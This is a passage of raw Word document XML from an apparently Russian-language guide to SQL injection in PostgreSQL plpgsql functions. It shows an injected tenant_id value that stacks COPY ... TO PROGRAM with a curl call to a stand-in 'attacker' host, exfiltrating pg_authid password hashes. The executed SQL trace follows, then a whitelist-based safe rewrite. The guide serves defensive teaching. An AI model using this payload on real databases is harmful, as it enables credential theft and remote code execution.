        <w:t>tenant_id = "42; COPY (SELECT rolpassword FROM pg_authid) TO PROGRAM 'curl http://attacker/$(cat -|base64)'; --"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AF1945" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT * FROM tenant_42; COPY (SELECT rolpassword FROM pg_authid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F690D08" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TO PROGRAM 'curl http://attacker/$(cat -|base64)'; --.users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C25E91D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE name = '...' ORDER BY id ASC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456CC517" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Если функция SECURITY DEFINER + owner=superuser + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_execute_server_program</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или superuser у owner — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RCE через COPY TO PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (3.7.1). Все passwords уходят на attacker-server через HTTP. Это полный stacked-RCE-chain через identifier-injection в schema-position.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D1EF19" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Variant C — полный SQL trace):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CE99EE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Caller-side:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F3FF14" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT * FROM app.generate_report(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638D5DE8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    '42; COPY (SELECT rolpassword FROM pg_authid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41587D99" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">     TO PROGRAM ''curl http://attacker/$(cat -|base64)''; --',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD73B22" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    'users', 'name', 'foo', 'ASC'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E047E6A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) AS t(id int, ...);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D72741B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADD3A94" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- В plpgsql функции sql_query собирается как (вычисленное):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041D0288" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT * FROM tenant_42; COPY (SELECT rolpassword FROM pg_authid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F6C8D0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TO PROGRAM 'curl http://attacker/$(cat -|base64)'; --.users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0182B041" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE name = 'foo' ORDER BY id ASC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB0552E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C07597" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- EXECUTE парсит и исполняет:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326C09D2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Statement 1: SELECT * FROM tenant_42 (вернёт rows или relation does not exist)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C184EB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Statement 2: COPY (SELECT rolpassword ...) TO PROGRAM '...' (RCE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C151E17" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Statement 3 (после --): остаток ignored</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71300F6D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Защита — полная переписывка на 3.16.1 + 3.16.3 + whitelist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCCB5D7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OR REPLACE FUNCTION app.generate_report_safe(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5768F303" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    tenant_id text,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703FA83B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    report_table text,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5525E016" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    filter_col text,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29128130" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    filter_value text,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F2D612" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    order_dir text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100B3CE5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2BD431" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RETURNS SETOF record LANGUAGE plpgsql AS $$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E781BB8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DECLARE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CC1300" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    schema_name text;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3001A079" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    allowed_tables text[] := ARRAY['users', 'articles', 'comments'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497601A6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    allowed_cols text[] := ARRAY['id', 'name', 'created_at', 'status'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2A0B6B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B04DC65" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    -- 1. Валидация tenant_id (только цифры)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2487BDF9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    IF tenant_id !~ '^[0-9]+$' THEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068FC48A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        RAISE EXCEPTION 'invalid tenant_id: %', tenant_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547395C2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    END IF;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71451315" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    schema_name := 'tenant_' || tenant_id;  -- безопасно: только digit-suffix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FA0425" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7DA820" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    -- 2. Whitelist для report_table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A7C5AB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    IF report_table &lt;&gt; ALL(allowed_tables) THEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39570D35" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        RAISE EXCEPTION 'table not in whitelist: %', report_table;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA28D28" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    END IF;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060E2EBF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6924087C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    -- 3. Whitelist для filter_col</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2666789B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    IF filter_col &lt;&gt; ALL(allowed_cols) THEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442D99F1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        RAISE EXCEPTION 'column not in whitelist: %', filter_col;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24777EE8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    END IF;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174C4148" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63712711" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
